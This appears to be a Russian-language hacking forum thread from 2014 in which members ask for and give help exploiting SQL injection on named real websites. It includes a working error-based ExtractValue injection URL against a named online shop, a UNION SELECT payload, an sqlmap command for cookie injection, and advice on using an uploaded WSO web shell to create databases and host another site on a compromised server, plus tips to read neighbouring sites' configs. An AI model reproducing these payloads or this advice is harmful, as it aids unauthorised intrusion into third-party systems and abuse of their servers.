Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    148
    Reputations:
    94
    Да в общем-то ничего. Стандартный Symlink, который данные из конфигов с соседних сайтов.
     
  2. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    неполучается стянуть, или тут он не работает?)
     
  3. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Code:
    http://www..**********/pixsell/imageview.php?id=392751  union/*!select*/  (1),(2),(user()),(4),(5),(6),(7),(8),(9),(10),(11),(12)
     
    #23543 Inoms, 7 Sep 2014
    Last edited: 8 Sep 2014
    1 person likes this.
  4. cyborgx

    cyborgx New Member

    Joined:
    19 Oct 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ребят подскажите как через wso шелл создать бд
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    883
    Reputations:
    859
    во вкладке [SQL] вводишь данные для подключения к БД, там появляется консоль, в ней уже вводишь команды для создание БД, почитай справочник _ttp://www.mysql.ru/docs/man/Database_use.html полезно будет!
     
    _________________________
  6. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    _http://www.moysvet.ru/catalog/view/118876' помогите раскрутить, всю голову сломал уже.
     
  7. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    373
    Likes Received:
    164
    Reputations:
    126
    http://www.moysvet.ru/catalog/view/118876'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
     
    _________________________
    2 people like this.
  8. BuG_4F

    BuG_4F Member

    Joined:
    20 May 2008
    Messages:
    88
    Likes Received:
    67
    Reputations:
    5
    Помогите раскрутить скулю
     
  9. Inkognito2008

    Inkognito2008 New Member

    Joined:
    10 Sep 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Есть участок кода на чужом сайте:

    Code:
    <?php
    $data=file_get_contents("http://site.ru");
    echo $data;
    ?>
    Содержимое http://site.ru я могу редактировать, то есть в переменной $data подконтрольный текст и он выводится на стороннем сайте.

    Какая тут уязвимость, возможно ли выполнение произвольного кода или создание php файла на сервере или тут только XSS?


    .
     
    #23549 Inkognito2008, 10 Sep 2014
    Last edited: 10 Sep 2014
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    883
    Reputations:
    859
    Можешь попробовать заюзать как локальную читалку! eval реализовать не получится, так как вывод через echo $data;
    Ищи конфиги БД и пробуй подключиться!
     
    _________________________
  11. Inkognito2008

    Inkognito2008 New Member

    Joined:
    10 Sep 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Сайт без БД, то есть код выполнить никак нельзя?

    Если говорить точнее то вывод идет через:

    Code:
    $GLOBALS['_RESULT']=array( "otvet" => "тут строка моя" ); exit;
    Вывод подхватывается JS и выводится на сайте.
     
    #23551 Inkognito2008, 10 Sep 2014
    Last edited: 10 Sep 2014
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    883
    Reputations:
    859
    тогда ищи уязвимости в функциях и пробуй их реализовать, можно еще попробовать сайты соседей посмотреть...
     
    _________________________
  13. yeti2

    yeti2 New Member

    Joined:
    15 Sep 2013
    Messages:
    76
    Likes Received:
    2
    Reputations:
    0
    Помогите составить запрос в sqlmap на sql inj cookie
    sqlmap.py -u "http://site:.com/index.php" --cookie="cacheSession=*" --random-agent --level=2 --risk=1
    верно? Он то показывает блинд , то нет
     
  14. cyborgx

    cyborgx New Member

    Joined:
    19 Oct 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    допустим через админку я залил шелл, ввел данные для подключения к БД данного сайта, зашел, появилась консоль в ней я могу создать новую базу данных(чистую) не затрагивая уже существующую и создать на серваке еще один сайт?
     
    #23554 cyborgx, 10 Sep 2014
    Last edited: 10 Sep 2014
  15. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Помогите раскрутить :)

    HTML:
    http://www.svetodom.ru/brand/jhkhjkhjk
    http://www.svetodom.ru/brand/jhkhjkhjk+AND
     
  16. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    943
    Likes Received:
    827
    Reputations:
    605
    а что сложного использовать error-based?
    например ExtractValue

     
    _________________________
    1 person likes this.
  17. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Br@!ns, еще добавлю, что нынче модно использовать короткие запросы. Вот еще для изучения пару векторов с выводом через error-based (VolgaCTF::MySQL Game):

     
    2 people like this.
  18. cyborgx

    cyborgx New Member

    Joined:
    19 Oct 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Подскажите плиз

    залил шелл, ввел данные для подключения к БД данного сайта, зашел, появилась консоль в ней я могу создать новую базу данных(чистую) не затрагивая уже существующую и создать на серваке еще один сайт?
     
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    172
    Reputations:
    75
    нет...
     
  20. int

    int Member

    Joined:
    18 May 2011
    Messages:
    80
    Likes Received:
    10
    Reputations:
    6
    Инъекция в INSERT. Вывод ошибок есть. Пытаюсь использовать error based вектор, но таблицы в которую происходит INSERT на сервере нету.
    Можно ли такое раскрутить?
     
Loading...
Thread Status:
Not open for further replies.